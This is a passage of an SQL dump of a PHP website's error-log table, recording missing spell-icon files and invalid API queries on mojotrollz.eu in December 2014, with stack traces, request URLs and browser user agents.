'/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_nature_healingway.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 17, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (632, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_frost_summonwaterelemental.png\' found.', '50daecd6d034623261afb0c1c2fd64279191ccce', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_frost_sum...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_frost_sum...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.02, '2014-12-14 03:49:20', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_frost_summonwaterelemental.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 11, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (633, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_dispelmagic.png\' found.', 'bd103ae278d105c9db040e824ce1a6dde143bc94', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_disp...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_disp...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:42:42', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_holy_dispelmagic.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 109, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (635, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1418520609674', '88cf1e860e0586e2f5b531cada31cfab4ba1f95d', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#2 {main}', '37.24.148.242', 0.004, '2014-12-14 02:30:20', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1418520609674', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (636, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1418520618501', 'b2baae2942173d56a0716a70cf791577ffd39206', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#2 {main}', '37.24.148.242', 0.012, '2014-12-14 02:30:29', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1418520618501', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (637, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1418520529290', '5abd47b31353583fb0839864c391c6866a3617ed', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#2 {main}', '37.24.148.242', 0.012, '2014-12-14 02:32:03', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1418520529290', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36 OPR/25.0.1614.63 (Edition FCD)', 14, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (638, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1418520724083', '8a1be6fae5116b57eac2fcc9308377767a5a25bc', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#2 {main}', '37.24.148.242', 0.016, '2014-12-14 02:32:10', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1418520724083', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36 OPR/25.0.1614.63 (Edition FCD)', 14, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (639, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1418520731398', '248b1d10d7986ad8d99d01353def3da2e85ab31b', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#2 {main}', '37.24.148.242', 0.008, '2014-12-14 02:32:12', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1418520731398', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36 OPR/25.0.1614.63 (Edition FCD)', 14, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (640, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_nature_astralrecalgroup.png\' found.', '95eb069563a04e8ae35012813837abaf0744d545', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_nature_as...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_nature_as...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 03:42:42', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_nature_astralrecalgroup.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 101, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (641, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_arcane_arcaneresilince.png\' found.', '54705d8377f1311538f71c66df9ffdedb0946767', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_arcane_ar...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_arcane_ar...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 02:34:38', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_arcane_arcaneresilince.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (642, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_arcane_arcaneresilience.png\' found.', '78e4621a0350022ca993146aa9f017fc1ad0d6ce', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_arcane_ar...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_arcane_ar...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.012, '2014-12-14 03:50:14', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_arcane_arcaneresilience.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 92, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (643, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_detectlesserinvisibility.png\' found.', 'c928e715f4b449064a48c36ea41b03e661a18797', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_de...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_de...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.024, '2014-12-14 03:42:41', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_shadow_detectlesserinvisibility.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 88, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (644, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_frost_iceshock.png\' found.', 'f4c6b17239899aa684c9be6450e604da350802db', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_frost_ice...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_frost_ice...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 03:42:39', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_frost_iceshock.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 87, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (645, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_teleport.png\' found.', '470de5603aa65dac9611087f8d49ba880d98db7c', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_te...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_te...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.012, '2014-12-14 03:42:39', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_shadow_teleport.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 79, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (646, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_nature_lightning.png\' found.', '28f599f83dc8f24bdc4150ac0f64f827b5699494', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_nature_li...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_nature_li...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 03:42:39', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_nature_lightning.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 77, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (647, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_fire_flamebolt.png\' found.', 'a2fc81319e533dca6b40ad712da69aeacc0650d6', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_fire_flam...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_fire_flam...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.024, '2014-12-14 03:42:44', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_fire_flamebolt.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 75, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (648, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_fire_meteorstorm.png\' found.', '1ad42003ef536d59b32accfc282a3db08bca86f2', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_fire_mete...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_fire_mete...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.004, '2014-12-14 03:42:44', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_fire_meteorstorm.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 73, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (649, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_fire_incinerate.png\' found.', 'f20f023c8abaa9d8dfc2a1d351af4c9b03767f83', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_fire_inci...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_fire_inci...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:42:44', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_fire_incinerate.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 70, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (650, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_fire_flare.png\' found.', '0ae1ba9d5cc7d498c3136875a9c1cc157b4bca1c', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_fire_flar...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_fire_flar...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.004, '2014-12-14 03:42:44', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_fire_flare.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 69, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (651, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_fire_flameshock.png\' found.', '25dc524b4f85754f1bf92b5c24a1f4f53921e027', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_fire_flam...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_fire_flam...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.004, '2014-12-14 03:42:44', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_fire_flameshock.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 98, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (652, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_fire_selfdestruct.png\' found.', '85391a4bba1af3d18cd0f012d884425a1154bbfa', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_fire_self...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_fire_self...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:42:44', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_fire_selfdestruct.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 68, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (653, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_fire_fireball02.png\' found.', '55aafe8a335f1d52ecb6dd857fd8e24d74e01aac', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_fire_fire...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_fire_fire...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 